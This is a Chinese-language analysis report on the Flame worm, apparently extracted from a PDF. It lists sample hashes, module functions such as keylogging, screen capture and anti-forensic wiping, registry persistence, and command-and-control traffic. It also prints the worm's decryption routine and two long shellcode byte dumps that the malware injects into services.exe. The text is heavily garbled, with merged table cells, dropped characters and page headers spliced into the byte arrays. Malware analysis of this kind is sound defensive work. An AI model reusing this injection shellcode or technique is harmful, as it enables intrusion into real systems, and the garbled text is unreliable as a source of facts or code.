2022Flame蠕蟲樣本集分析報告

Flame蠕蟲樣本集分析報告第1頁/共92頁Flame蠕蟲樣本集分析報告Flame蠕蟲樣本集分析報告第PAGE第2頁/共92頁1 事件背景2012528日起陸續(xù)捕獲到FlameFlame620HASH6MB。包（如Lua等Stuxnet使用過的USB2010年針對伊朗核設(shè)施的APT[1]。據(jù)外界現(xiàn)有分析，該惡意軟件已經(jīng)非常謹(jǐn)慎地運作了至少兩年時間[2]，它不但能夠竊取文件，對用戶系統(tǒng)進(jìn)行截屏，通過USB傳播禁用安全廠商的安全產(chǎn)品，并可以在一定條件下傳播到其他系統(tǒng)，還有可能利用微軟Windows系統(tǒng)的已知或已修補的漏洞發(fā)動攻擊，進(jìn)而在某個網(wǎng)絡(luò)中大肆傳播。Aee認(rèn)為此威脅是uxnet和Duu3]；Flame[4]FlameStuxnetDuquFlame蠕蟲文件信息文件名文件MD5與大小功能mssecmgr.ocxb51424138d72d343f22d03438fc9ced5(1,236,992主模塊運行后會將其資字節(jié))0a17040c18a6646d485bde9ce899789f(6,172,160源文件中的多個功能模塊解密釋放出來，并將字節(jié))ee4b589a7b5d56ada10d9a15f81dada9(892,417字節(jié))e5a49547191e16b0a69f633e16b96560(6,166,528字節(jié))bdc9e04388bda8527b398a8c34667e18(1,236,992程中。它通過調(diào)用Lua來執(zhí)行腳本完成指定功能。字節(jié))37c97c908706969b2e3addf70b68dc13(391,168字節(jié))advnetcfg.ocxf0a654f7c485ae195ccf81a72fe083a2 (643,072由主模塊釋放：截取屏字節(jié))幕信息。8ed3846d189c51c6a0d69bdc4e66c1a5(421,888字節(jié))bb5441af1e1741fca600e9c433cb1550(643,944字節(jié))文件名文件MD5與大小功能msglu32.ocxd53b39fb50841ff163f6e9cfd8b52c2e (1,721,856由主模塊釋放：遍歷系統(tǒng)中的各種類型的文件，讀取特定文件類型文件的信息，將其寫入SQL也可以收集文件中與地字節(jié))2512321f27a05344867f381f632277d8(1,729,536字節(jié))nteps32.ocxc9e00c9d94d1a790d5923b050b0bd741 (827,392由主模塊釋放：用來鍵盤記錄和截取屏幕信息。對一些郵件域名進(jìn)行監(jiān)控。字節(jié))e66e6dd6c41ece3566f759f7b4ebfa2d(602,112字節(jié))5ecad23b3ae7365a25b11d4d608adffd (827,392字節(jié))rpcns4.ocx(soapr32.ocx)296e04abb00ea5f18ba021c34e486746(160,768字節(jié))1f9f0baa3ab56d72daab024936fdcaf3 (188,416用來收集信息的功能模塊。獲取系統(tǒng)中的一些信息，例如：安裝的軟件信息、網(wǎng)絡(luò)信息、無USB字節(jié))cc54006c114d51ec47c173baea51213d(253,952字節(jié))e6cb7c89a0cae27defa0fd06952791b2(349,596字節(jié))comspol32.ocx20732c97ef66dd97389e219fc0182cb5(634,880字節(jié))分析中。00004784.dllec992e35e794947a17804451f2a8857e(483,328是用來收集用戶計算機信息，包括窗體標(biāo)題、注冊表相關(guān)鍵值信息、(jimmy.dll)字節(jié))wusetupv.exe1f61d280067e2564999cac20e386041c(29,928字節(jié))收集本機各個接口的信息、進(jìn)程信息，注冊表鍵值信息等。DSMGR.DLL(browse32.ocx)2afaab2840e4ba6af0e5fa744cd8f41f (116,224)7d49d4a9d7f0954a970d02e5e1d85b6b(458,869節(jié))用來刪除惡意軟件所有痕跡，防止取證分析。boot32drv.sys(00004069.exe)06a84ad28bbc9365eb9e08c697555154(49,152字節(jié))它是一個加密數(shù)據(jù)文件并不是PE0xFFxor操作。表錯誤!文檔中沒有指定樣式的文字。-1現(xiàn)有Flame蠕蟲PE文件與功能一覽表Ef_trace.logdstrlog.datmscorest.datsoapr32.ocxwinrt32.dllGRb9M2.batdstrlogh.datmscrypt.datsrcache.datwinrt32.ocxLncache.datfmpidx.binmsglu32.ocxsstab.datwpab32.batTemp~mso2a0.tmpindsvc32.dllmspovst.datsstab0.datwpgfilter.datTemp~mso2a1.tmpindsvc32.ocxmssui.drvsstab1.dat~8C5FF6C.tmpTemp~mso2a2.tmplmcache.datmssvc32.ocxsstab10.dat~DF05AC8.tmpadvnetcfg.ocxltcache.datnt2cache.datsstab11.dat~DFD85D3.tmpadvpck.datm3aaux.datntaps.datsstab12.dat~DFL543.tmpaudfilter.datm3afilter.datntcache.datsstab15.dat~DFL544.tmpEf_trace.logdstrlog.datmscorest.datsoapr32.ocxwinrt32.dllauthcfg.datm3asound.datnteps32.ocxsstab2.dat~DFL546.tmpauthpack.ocxm4aaux.datpcldrvx.ocxsstab3.dat~HLV084.tmpboot32drv.sysm4afilter.datposttab.binsstab4.dat~HLV294.tmpccalc32.sysm4asound.datqpgaaux.datsstab5.dat~HLV473.tmpcommgr32.dllm5aaux.datrccache.datsstab6.dat~HLV751.tmpcomspol32.dllm5afilter.datrpcnc.datsstab7.dat~HLV927.tmpcomspol32.ocxm5asound.datscaud32.exesstab8.dat~KWI988.tmpctrllist.datmixercfg.datscsec32.exesstab9.dat~KWI989.tmpdmmsap.datmixerdef.datsdclt32.exesyscache.dat~TFL848.tmpdomm.datmlcache.datsecindex.datsyscache3.dat~TFL849.sndmix.drvwatchxb.sys~ZFF042.tmpdomm3.datmpgaaux.datmscorest.datwavesup3.drv~a28.tmpdommt.datmpgaud.datmscrypt.datwinconf32.ocx~a38.tmp~dra51.tmp~dra52.tmp~dra53.tmp~dra61.tmp~rei524.tmp~rei525.tmp~rf288.tmp表錯誤!文檔中沒有指定樣式的文字。-2Flame蠕蟲所有衍生文件和其它文件列表功能分析MSSECMGR.OCX主模塊分析mssecmgr.ocx的DLL6M，運行后會連接C&CWIFIUSB%Windir%\temp\服務(wù)器對本地網(wǎng)絡(luò)傳播和通過一個USBLuaLua腳本地行為添加注冊表：HKLM_SYSTEM\CurrentControlSet\Control\LsaAuthenticationPackages=mssecmgr.ocxecrcx%yem%\ecr。通過對“146”資源進(jìn)行釋放并加載運行，以下為資源釋放的模塊：文件文件MD5文件MD5%System32%\advnetcfg.ocxBB5441AF1E1741FCA600E9C433CB1550%System32%\boot32drv.sysC81D037B723ADC43E3EE17B1EEE9D6CC%System32%\msglu32.ocxD53B39FB50841FF163F6E9CFD8B52C2E%Syste32%\nteps32.ocxC9E00C9D94D1A790D5923B050B0BD741%Syste32%\soapr32.ocx296E04ABB00EA5F18BA021C34E486746%Syste32%\ccalc32.sys5AD73D2E4E33BB84155EE4B35FBEFC2B其它文件：%Windir%\Ef_trace.log在%ProgramFiles%\CommonFiles\MicrosoftShared\MSAudio目錄下為各模塊的配置信息和自身副本文件，從網(wǎng)絡(luò)中更新或下載新模塊配置也會在這里，列表如下：Audcacheaudfilter.datdstrlog.datlmcache.datntcache.datmscrypt.datwavesup3.drv（）wpgfilter.dat根據(jù)“146”資源配置還可能會存在以下文件目錄：%ProgramFiles%\CommonFiles\MicrosoftShared\MSSecurityMgr%ProgramFiles%\CommonFiles\MicrosoftShared\MSAudio%ProgramFiles%\CommonFiles\MicrosoftShared\MSAuthCtrl%ProgramFiles%\CommonFiles\MicrosoftShared\MSAPackages%ProgramFiles%\CommonFiles\MicrosoftShared\MSSndMix遍歷安全進(jìn)程列表關(guān)于遍歷安全進(jìn)程列表內(nèi)容參見附錄一（詳見附錄一：為Mssecmgr.ocx文件中的遍歷安全進(jìn)程列表，其列表和其它模塊中的一些遍歷進(jìn)程列表中一些進(jìn)程是相同的。）在主模塊中發(fā)現(xiàn)一個Lua腳本調(diào)用函數(shù)列表內(nèi)容參見附錄六。（詳見附錄六：為Mssecmgr.ocx文件中的Lua腳本調(diào)用函數(shù)列表內(nèi)容）話、利用PE加密資源、用SQLiteUSBSSH和HTTPS協(xié)議與C&C服務(wù)器通信等。網(wǎng)絡(luò)行為訪問地址1：\h/訪問地址2：\h/windowsupdate/v6/default.aspx協(xié)議：Http端口：80訪問地址：18[][][][]協(xié)議：Https端口：443病毒運行后，首先訪問Windows系統(tǒng)升級服務(wù)器地址，然后對IP地址為18的四個域名進(jìn)行訪問，并回傳數(shù)據(jù)。圖3-1Post數(shù)據(jù)（。圖3-2文件啟動加載順序該病毒的加載方式有兩種，一種是在注冊表中添加鍵值，另一種是利用批處理文件來執(zhí)行DOS命令運行Rundll32.exe加載主模塊運行。首先查詢注冊表HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SeCEdit和查看%ProgramFiles%\CommonFiles\MicrosoftShared\MSAudio\wavesup3.drv文件是否存在。寫入HKLM\System\CurrentControlSet\Control\TimeZoneInformation\StandardSize值為：114。MSSecurityMgrMscrypt.dat1601-1-11分鐘后寫入Wpgfilter.dat1601-1-108:00:001分鐘左右后寫入Wavesup3.drv1601-1-108:00:00，寫入文件后會寫入AudcacheC:\DocumentsandSettings\Administrator\LocalSettings\Temp\dat3C.tmpC:\DocumentsandSettings\AllUsers\LocalSettings\Temp\dat3C.tmpC:\DocumentsandSettings\DefaultUser\LocalSettings\Temp\dat3C.tmpC:\DocumentsandSettings\LocalService\LocalSettings\Temp\dat3C.tmpC:\DocumentsandSettings\NetworkService\LocalSettings\Temp\dat3C.tmpC:\WINDOWS\Temp\dat3C.tmpServices.exeShell32.dllShell32.dllShell32.dll中，再加載AudcacheShell32.dllNeps32.exeComspol32.ocxAdvnetcfg.ocxBoot32drv.sys、Msglu32.ocxKernel32.dll然后注入到Winlogon.exeShell32.dllShell32.dll把Netps32.ocx和Ccalc32.sysShell32.dll中。并將它們的時間改為Kernel32.dll文通過注入Explore.exeShell32.dllShell32.dll創(chuàng)建Iexplore.exeWpgfilter.datShell32.dllAudcache文件Shell32.dll中。幾分鐘后加載Wavesup3.drv程序中大量數(shù)據(jù)被加密。加密算法代碼位置如下：0x1000E3F5procneartest edx,edxpush esimov esi,eaxjbe short0x1000E42Fpush ebxpush edipush 0Bhpop edisub edi,esi0x1000E403:lea ecx,[edi+esi]lea eax,[ecx+0Ch]0x1000E42F:0x1000E3F5

imul eax,ecxadd eax,dword_10376F70mov ecx,eaxshr ecx,18hmov ebx,eaxshr ebx,10hxor cl,blmov ebx,eaxshr ebx,8xor cl,blxor cl,alsub [esi],clinc esidec edxjnz short0x1000E403pop edipop ebxpop retn對該函數(shù)的調(diào)用有2個函數(shù)。分別位置如下：1000E451movzxedx,wordptr[ebx+9]1000E455leaeax,[ebx+0Bh]1000E458mov[ebp+8],eax1000E45Bcall0x1000E3F51000E498movzxedx,wordptr[esi+12h]1000E49Cleaebx,[esi+14h]1000E49Fmoveax,ebx1000E4A1call0x1000E3F5解密算法說明：函數(shù)有兩個參數(shù)：edx[解密字符串長度]，eax[解密字符串的起始地址]返回值：eax[解密后字符串的起始地址]解密算法：ECX=(0xBh+n)*(0xBh+0xCh+n)+[0x10376F70h]注意：n是要解密的字符距起始字符的距離.CL=(M1)xor(M2)xor(M3)xor(M4)解密數(shù)據(jù)=加密數(shù)據(jù)–CL第一次調(diào)用：函數(shù)有一個參數(shù)：arg.1[地址]第二次調(diào)用：函數(shù)有一個參數(shù)：arg.1[address]解密字符串長度：[word]arg.1+0x12h解密字符串起始地址：[dword]arg.1+0x14h返回值：解密后字符串的起始地址實現(xiàn)細(xì)節(jié)EncodePointerDuquDecodePointerdllmov eax,[ebp-4]mov eax,[esi+eax*4] //exportfuncnameoffsetadd eax,[ebp+module_handle]push [ebp+func_name_size]mov [ebp+export_func_name],eaxpush eaxcall IsBadReadPtrtest eax,eaxjnz 0x1000BE19push [ebp+func_name]push [ebp+export_func_name]call lstrcmpiAtest eax,eaxjz short0x1000BE2B圖3-3動態(tài)獲取指定Dll文件中的函數(shù)%ProgramFiles%\CommonFiles\MicrosoftShared（WINDOWSSYSTEM32并通過文件查找的API函數(shù)來尋找Kernel32.dll間設(shè)置為與Kernel32.dllEY_OCA_MCHEYEMCuenConoConoAuhencaons34[5]圖3-4修改的注冊表鍵值Flame蠕蟲樣本集分析報告Flame蠕蟲樣本集分析報告1010/92頁WriteProcessMemoryShellCode寫入CreateRemoteThread函數(shù)創(chuàng)建遠(yuǎn)程線程執(zhí)行ShellCode。調(diào)試發(fā)現(xiàn)加密數(shù)據(jù)，并將其釋放到指定目錄下：C:\ProgramFiles\CommonFiles\MicrosoftShared\MSSecurityMgr\mscrypt.dat此模塊中的數(shù)據(jù)應(yīng)為配置數(shù)據(jù)。分析程序的進(jìn)程操作行為：程序利用OpenProcess打開services.exe進(jìn)程,句柄為0x174；WriteProcessMemoryServices.exeShellcodeSehllCode內(nèi)容,長度為0x820x55,0x8B,0xEC,0x51,0x53,0x56,0x57,0x33,0xFF,0x89,0x7D,0xFC,0xE8,0x00,0x00,0x00,0x00,0x58,0x89,0x45,0xFC,0x8B,0x45,0xFC,0x6A,0x64,0x59,0x48,0x49,0x89,0x45,0xFC,0x74,0x5B,0x81,0x38,0xBA,0xBA,0x0D,0xF0,0x75,0xF1,0x8D,0x70,0x04,0x8B,0x0E,0x6A,0xFF,0xFF,0x31,0x8B,0xD8,0xFF,0x50,0x08,0x85,0xC0,0x75,0x2C,0x8B,0x06,0x83,0x7C,0x07,0x0C,0x00,0x74,0x0E,0xFF,0x75,0x10,0x03,0xC7,0xFF,0x75,0x0C,0xFF,0x70,0x08,0xFF,0x50,0x0C,0x81,0xC7,0x20,0x02,0x00,0x00,0x81,0xFF,0x00,0x55,0x00,0x00,0x72,0xFF,0x75,0x08,0xFF,0x50,0x04,0x5F,0x5E,0x5B,0xC9,0xC2,0x0C,0x00,0x33,0xC0,0x40,0xEB,0xF4第二段ShellCode會被后面創(chuàng)建的遠(yuǎn)程線程直接執(zhí)行。ShellCode內(nèi)容,長度為0x70c0x55,0x8B,0xEC,0x83,0xEC,0x70,0x53,0x33,0xDB,0x56,0x8B,0x75,0x08,0x57,0x33,0xC0,0x89,0x5D,0xA8,0x8D,0x7D,0xAC,0xAB,0xAB,0x8D,0x86,0x74,0x04,0x00,0x00,0x50,0xC6,0x45,0xFA,0x00,0x89,0x5D,0xE8,0x88,0x5D,0xFB,0x89,0x5D,0xE4,0x89,0x5D,0xEC,0x89,0x5D,0xC8,0x89,0x5D,0xD0,0x89,0x5D,0xD4,0x89,0x5D,0xBC,0x89,0x5D,0xC4,0x89,0x5D,0xE0,0x89,0x5D,0xDC,0xC7,0x45,0xF0,0x01,0x00,0xFF,0xFF,0x89,0x9E,0x2C,0x0B,0x00,0x00,0xFF,0x56,0x10,0x3B,0xC3,0x89,0x45,0xC0,0x75,0x0A,0xB8,0x02,0x00,0xFF,0xFF,0xE9,0xA0,0x06,0x00,0x00,0x8D,0x86,0x81,0x04,0x00,0x00,0x50,0xFF,0x75,0xC0,0xFF,0x56,0x1C,0x3B,0xC3,0x75,0x0A,0xB8,0x03,0x00,0xFF,0xFF,0xE9,0x85,0x06,0x00,0x00,0x53,0x8D,0x4D,0xDC,0x51,0x6A,0x01,0x8D,0x8E,0xB6,0x04,0x00,0x00,0x51,0xFF,0xD0,0x85,0xC0,0x75,0x0A,0xB8,0x04,0x00,0xFF,0xFF,0xE9,0x67,0x06,0x00,0x00,0x8B,0x45,0xDC,0x89,0x45,0xAC,0x8D,0x86,0x30,0x0B,0x00,0x00,0x8B,0x78,0x3C,0x03,0xF8,0xC7,0x45,0xA8,0x0C,0x00,0x00,0x00,0x89,0x5D,0xB0,0x0F,0xB7,0x47,0x14,0x8D,0x44,0x38,0x18,0x89,0x45,0xCC,0x8B,0x47,0x08,0x25,0x07,0xF8,0xFF,0xFF,0x05,0x00,0x00,0x90,0xD6,0x3D,0x00,0x00,0x00,0x06,0x0F,0x87,0x24,0x06,0x00,0x00,0x38,0x9E,0x20,0x09,0x00,0x00,0x8B,0x47,0x50,0x89,0x45,0x08,0x74,0x67,0x53,0x53,0x6A,0x03,0x53,0x6A,0x01,0x68,0x00,0x00,0x00,0x80,0x8D,0x86,0x22,0x09,0x00,0x00,0x50,0xFF,0x56,0x50,0x83,0xF8,0xFF,0x89,0x45,0xF4,0x75,0x0A,0xB8,0x06,0x00,0xFF,0xFF,0xE9,0xF3,0x05,0x00,0x00,0x53,0xFF,0x75,0x08,0x53,0x68,0x02,0x00,0x00,0x01,0x53,0x50,0xFF,0x56,0x28,0xFF,0x75,0xF4,0x89,0x45,0xD8,0xFF,0x56,0x4C,0x39,0x5D,0xD8,0x75,0x0A,0xB8,0x07,0x00,0xFF,0xFF,0xE9,0xCC,0x05,0x00,0x00,0xFF,0x75,0x08,0x53,0x53,0x6A,0x04,0x0F,0x6A,0x04,0x68,0x00,0x10,0x00,0x00,0x50,0x53,0xFF,0x56,0x04,0x89,0x45,0xF4,0x39,0x5D,0xF4,0x75,0x0A,0xB8,0x08,0x00,0xFF,0xFF,0xE9,0x96,0x05,0x00,0x00,0x8D,0x45,0xC4,0x50,0x6A,0x04,0xFF,0x75,0x08,0xFF,0x75,0xF4,0xFF,0x56,0x0C,0x85,0xC0,0x75,0x0C,0xC7,0x45,0xF0,0x09,0x00,0xFF,0xFF,0xE9,0x8D,0x04,0x00,0x00,0xFF,0x77,Flame蠕蟲樣本集分析報告Flame蠕蟲樣本集分析報告第第頁/92頁0x00,0x50,0xFF,0x75,0xF4,0xFF,0x56,0x20,0x83,0xC4,0x18,0x66,0x39,0x5F,0x06,0x89,0x5D,0x08,0x76,0x35,0x0F,0xB7,0x45,0x08,0x8B,0x4D,0xCC,0x6B,0xC0,0x28,0x03,0xC1,0xFF,0x70,0x10,0x8B,0x50,0x14,0x8B,0x40,0x0C,0x03,0x45,0xF4,0x8D,0x8E,0x30,0x0B,0x00,0x00,0x03,0xD1,0x52,0x50,0xFF,0x56,0x20,0x83,0xC4,0x0C,0xFF,0x45,0x08,0x66,0x8B,0x45,0x08,0x66,0x3B,0x47,0x06,0x72,0xCB,0x8B,0x45,0xF4,0x2B,0x47,0x34,0x89,0x45,0xB8,0x0F,0x84,0x8A,0x00,0x00,0x00,0x8B,0x87,0xA0,0x00,0x00,0x00,0x03,0x45,0xF4,0x3B,0x45,0xF4,0x75,0x0C,0xC7,0x45,0xF0,0x0A,0x00,0xFF,0xFF,0xE9,0x09,0x04,0x00,0x00,0x8B,0x8F,0xA4,0x00,0x00,0x00,0x03,0xC8,0x3B,0xC1,0x89,0x4D,0xB4,0x73,0x61,0x8B,0x50,0x04,0x8B,0x08,0x03,0x4D,0xF4,0x83,0xEA,0x08,0xF7,0xC2,0xFE,0xFF,0xFF,0xFF,0x89,0x5D,0x08,0x76,0x43,0x8B,0x55,0x08,0x0F,0xB7,0x54,0x50,0x08,0x81,0xE2,0xFF,0x0F,0x00,0x00,0x89,0x55,0xD8,0x8B,0x55,0x08,0x0F,0xB7,0x54,0x50,0x08,0x0F,0xB7,0xD2,0xC1,0xEA,0x0C,0x74,0x10,0x83,0xFA,0x03,0x75,0x3F,0x0F,0xB7,0x55,0xD8,0x8B,0x5D,0xB8,0x03,0xD1,0x01,0x1A,0x8B,0x50,0x04,0xFF,0x45,0x08,0x83,0xEA,0x08,0xD1,0xEA,0x33,0xDB,0x39,0x55,0x08,0x72,0xBD,0x03,0x40,0x04,0x3B,0x45,0xB4,0x72,0x9F,0x8B,0x87,0x80,0x00,0x00,0x00,0x03,0x45,0xF4,0x3B,0x45,0xF4,0x75,0x18,0xC7,0x45,0xF0,0x0C,0x00,0xFF,0xFF,0xE9,0x7F,0x03,0x00,0x00,0xC7,0x45,0xF0,0x0B,0x00,0xFF,0xFF,0xE9,0x73,0x03,0x00,0x00,0x39,0x58,0x0C,0x0F,0x84,0x80,0x00,0x00,0x00,0x83,0xC0,0x10,0x89,0x45,0x08,0x8B,0x45,0x08,0x83,0x38,0x00,0x74,0x70,0x83,0x78,0xF4,0x00,0x0F,0x85,0xB9,0x00,0x00,0x00,0x8B,0x58,0xFC,0x03,0x5D,0xF4,0x53,0xFF,0x56,0x18,0x85,0xC0,0x0F,0x84,0xB0,0x00,0x00,0x00,0x53,0xFF,0x56,0x10,0x85,0xC0,0x89,0x45,0xD8,0x0F,0x84,0xAA,0x00,0x00,0x00,0x8B,0x45,0x08,0x8B,0x18,0x03,0x5D,0xF4,0xEB,0x29,0x8B,0x03,0x85,0xC0,0x79,0x07,0x25,0xFF,0xFF,0x00,0x00,0xEB,0x08,0x8B,0x4D,0xF4,0x03,0xC1,0x83,0xC0,0x02,0x50,0xFF,0x75,0xD8,0xFF,0x56,0x1C,0x85,0xC0,0x89,0x03,0x0F,0x84,0x83,0x00,0x00,0x00,0x83,0xC3,0x04,0x83,0x3B,0x00,0x75,0xD2,0x83,0x45,0x08,0x14,0x8B,0x45,0x08,0x83,0x78,0xFC,0x00,0x75,0x88,0x33,0xDB,0x66,0x39,0x5F,0x06,0x89,0x5D,0x08,0x0F,0x86,0xBA,0x00,0x00,0x00,0x0F,0xB7,0x45,0x08,0x8B,0x4D,0xCC,0x6B,0xC0,0x28,0x03,0xC1,0x8B,0x48,0x24,0xF7,0xC1,0x20,0x00,0x00,0x20,0x74,0x07,0xC7,0x45,0xC8,0x01,0x00,0x00,0x00,0x33,0xD2,0x42,0x85,0xC9,0x79,0x03,0x89,0x55,0xD0,0xF7,0xC1,0x00,0x00,0x00,0x40,0x74,0x03,0x89,0x55,0xD4,0x39,0x5D,0xC8,0x8B,0xCA,0x74,0x42,0x39,0x5D,0xD0,0x74,0x2E,0x6A,0x40,0x59,0xEB,0x49,0xC7,0x45,0xF0,0x0D,0x00,0xFF,0xFF,0xEB,0x19,0xC7,0x45,0xF0,0x0E,0x00,0xFF,0xFF,0xEB,0x10,0xC7,0x45,0xF0,0x0F,0x00,0xFF,0xFF,0xEB,0x07,0xC7,0x45,0xF0,0x10,0x00,0xFF,0xFF,0x33,0xDB,0xE9,0x70,0x02,0x00,0x00,0x8B,0x4D,0xD4,0xF7,0xD9,0x1B,0xC9,0x83,0xE1,0x10,0x83,0xC1,0x10,0xEB,0x11,0x39,0x5D,0xD4,0x74,0x0C,0x33,0xC9,0x39,0x5D,0xD0,0x0F,0x95,0xC1,0x8D,0x4C,0x09,0x02,0x8B,0x50,0x08,0x8B,0x40,0x0C,0x03,0x45,0xF4,0x89,0x55,0xB4,0x8D,0x55,0xC4,0x52,0x51,0xFF,0x75,0xB4,0x50,0xFF,0x56,0x0C,0x85,0xC0,0x74,0x28,0xFF,0x45,0x08,0x66,0x8B,0x45,0x08,0x66,0x3B,0x47,0x06,0x0F,0x82,0x46,0xFF,0xFF,0xFF,0x8B,0x7F,0x28,0x03,0x7D,0xF4,0x89,0x7D,0xE0,0x75,0x18,0xC7,0x45,0xF0,0x12,0x00,0xFF,0xFF,0xE9,0x0C,0x02,0x00,0x00,0xC7,0x45,0xF0,0x11,0x00,0xFF,0xFF,0xE9,0x00,0x02,0x00,0x00,0xFF,0xB6,0x1C,0x09,0x00,0x00,0x33,0xFF,0x47,0x57,0xFF,0x75,0xF4,0xFF,0x55,0xE0,0x3B,0xC7,0x74,0x14,0x53,0x01,0x00,0x00,0x8D,0x86,0x6A,0x02,0x00,0x00,0x50,0x53,0x8D,0x45,0xA8,0x50,0x89,0x7D,0xBC,0xFF,0x56,0x44,0x3B,0xC3,0x89,0x45,0xE8,0x75,0x0C,0xC7,0x45,0xF0,0x14,0x00,0xFF,0xFF,0xE9,0xB3,0x01,0x00,0x00,0x6A,0xFF,0x50,0xFF,0x56,0x48,0x85,0xC0,0x74,0x0C,0xC7,0x45,0xF0,0x15,0x00,0xFF,0xFF,0xE9,0x9D,0x01,0x00,0x00,0x8D,0x46,0x60,0x50,0x53,0x68,0x1F,0x00,0x0F,0x00,0xC6,0x45,0xFB,0x01,0xFF,0x56,0x2C,0x3B,0xC3,0x89,0x45,0xE4,0xC6,0x45,0x0B,0x00,0xBF,0x08,0x55,0x00,0x00,0x75,0x28,0x8D,0x46,0x60,0x50,0x57,0x53,0x6A,0x04,0x8D,0x45,0xA8,0x50,0x6A,0xFF,0xC6,0x45,0x0B,0x01,0xFF,0x56,0x28,0x3B,0xC3,0x89,0x45,0xE4,0x75,0x0C,0xC7,0x45,0xF0,0x16,0x00,0xFF,0xFF,0xE9,0x54,0x01,0x00,0x00,0x57,0x53,0x53,0x6A,0x02,0xFF,0x75,0xE4,0xFF,0x56,0x30,0x3B,0xC3,0x89,0x45,0xEC,0x75,0x0C,0xC7,0x45,0xF0,0x17,0x00,0xFF,0xFF,0xE9,0x36,0x01,0x00,0x00,0x80,0x7D,0x0B,0x00,0x0F,0x84,0x01,0x01,0x00,0x00,0x57,Flame蠕蟲樣本集分析報告Flame蠕蟲樣本集分析報告第1第1PAGE2頁/共92頁0x53,0xFF,0x75,0xEC,0xFF,0x56,0x24,0x83,0xC4,0x0C,0x89,0x5D,0xD0,0x8D,0xBE,0xFA,0x04,0x00,0x00,0x57,0xFF,0x56,0x14,0x3B,0xC3,0x89,0x45,0xB4,0x74,0x3B,0xFF,0x45,0xD0,0x83,0x7D,0xD0,0x05,0x7C,0xEC,0x53,0x6A,0x18,0x8D,0x45,0x90,0x50,0x53,0x6A,0xFF,0xFF,0x56,0x3C,0x3D,0x00,0x00,0x00,0xC0,0x72,0x2A,0x53,0x6A,0x18,0x8D,0x45,0x90,0x50,0x53,0x6A,0xFF,0xFF,0x56,0x3C,0x83,0xF8,0xFF,0x77,0x18,0xC7,0x45,0xF0,0xE9,0xC6,0x00,0x00,0x00,0x8B,0x45,0x94,0x8B,0x40,0x0C,0x83,0xC0,0x0C,0x8B,0x38,0xEB,0x0A,0x8B,0x4F,0x18,0x3B,0x4D,0xB4,0x74,0x08,0x8B,0x3F,0x3B,0xF8,0x75,0xF2,0xEB,0x68,0x8B,0x47,0x1C,0x8B,0x4D,0xEC,0x89,0x41,0x04,0x8B,0x86,0x18,0x09,0x00,0x00,0x6A,0x40,0x68,0x00,0x10,0x00,0x00,0x83,0xC0,0x14,0x50,0x53,0xFF,0x56,0x04,0x3B,0xC3,0x75,0x09,0xC7,0x45,0xF0,0x1A,0x00,0xFF,0xFF,0xEB,0x7E,0x8B,0x4E,0x20,0x89,0x48,0x10,0x8B,0x4E,0x38,0x89,0x48,0x0C,0x8B,0x4E,0x48,0x89,0x48,0x08,0x8B,0x4D,0xEC,0xC7,0x00,0xBA,0xBA,0x0D,0xF0,0x89,0x48,0x04,0xFF,0xB6,0x18,0x09,0x00,0x00,0x83,0xC0,0x14,0xFF,0xB6,0x14,0x09,0x00,0x00,0x89,0x45,0xB4,0x50,0xFF,0x56,0x20,0x8B,0x45,0xB4,0x83,0xC4,0x0C,0x89,0x47,0x1C,0x8B,0x45,0xEC,0x39,0x58,0x04,0x75,0x09,0xC7,0x45,0xF0,0x1B,0x00,0xFF,0xFF,0xEB,0x30,0x8B,0x4D,0xE8,0x89,0x08,0x8B,0x4D,0xEC,0x33,0xC0,0x33,0xD2,0x83,0xC1,0x08,0x3B,0xC3,0x75,0x26,0x39,0x19,0x75,0x02,0x8B,0xC1,0x42,0x81,0xC1,0x20,0x02,0x00,0x00,0x83,0xFA,0x28,0x72,0xEA,0x3B,0xC3,0x75,0x10,0xC7,0x45,0xF0,0x1C,0x00,0xFF,0xFF,0x8B,0x7D,0xF4,0xC6,0x45,0xFA,0x01,0xEB,0x5F,0x8B,0x4D,0xE0,0x8B,0x7D,0xF4,0x89,0x48,0x04,0x89,0x38,0xC7,0x40,0x08,0x01,0x00,0x00,0x00,0x8B,0x8E,0x1C,0x09,0x00,0x00,0x89,0x48,0x0C,0x8A,0x8E,0x20,0x09,0x00,0x00,0x88,0x48,0x10,0x8B,0x8E,0x10,0x09,0x00,0x00,0x89,0x88,0x1C,0x02,0x00,0x00,0x68,0x0A,0x02,0x00,0x00,0x8D,0x8E,0x04,0x07,0x00,0x00,0x51,0x83,0xC0,0x12,0x50,0xFF,0x56,0x20,0x83,0xC4,0x0C,0x80,0x7D,0x0B,0x00,0x74,0x13,0xFF,0x75,0xE8,0x89,0x5D,0xEC,0x89,0x5D,0xE4,0xFF,0x56,0x38,0xC6,0x45,0xFB,0x00,0x89,0x5D,0xE8,0x39,0x5D,0xEC,0x74,0x06,0xFF,0x75,0xEC,0xFF,0x56,0x34,0x39,0x5D,0xE4,0x74,0x06,0xFF,0x75,0xE4,0xFF,0x56,0x4C,0x80,0x7D,0xFB,0x00,0x74,0x06,0xFF,0x75,0xE8,0xFF,0x56,0x38,0x39,0x5D,0xE8,0x74,0x06,0xFF,0x75,0xE8,0xFF,0x56,0x4C,0x5C,0x80,0x7D,0xFA,0x00,0xB8,0x1E,0x00,0xFF,0xFF,0x74,0x2C,0x39,0x5D,0xBC,0x74,0x0B,0x39,0x5D,0xE0,0x74,0x06,0x53,0x53,0x57,0xFF,0x55,0xE0,0x80,0xBE,0x20,0x09,0x00,0x00,0x00,0x74,0x06,0x57,0xFF,0x56,0x34,0xEB,0x0A,0x68,0x00,0x80,0x00,0x00,0x53,0x57,0xFF,0x56,0x08,0x8B,0x45,0xF0,0x89,0xBE,0x2C,0x0B,0x00,0x00,0xEB,0x05,0xB8,0x05,0x00,0xFF,0xFF,0x5F,0x5E,0x5B,0xC9,0xC2,0x04,0x00,0x68第三次接著上面的ShellCode地址順序?qū)懭耄簩懭霐?shù)據(jù)，長度為40x00,0x00,0x00,0x00第四次接著上面的ShellCode地址順序?qū)懭耄篠hellCode文件，長度為：0x5e2330最后惡意代碼通過函數(shù)CreateRemoteThread函數(shù)來創(chuàng)建遠(yuǎn)程線程，執(zhí)行剛才寫入到Services.exe進(jìn)程中的Shellcode。發(fā)現(xiàn)對注冊表進(jìn)行操作：HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\SeCEditHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformationStandardSizeHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:(ahyy)鍵值：類型:REG_BINARY長度：16(0x10)字節(jié)s05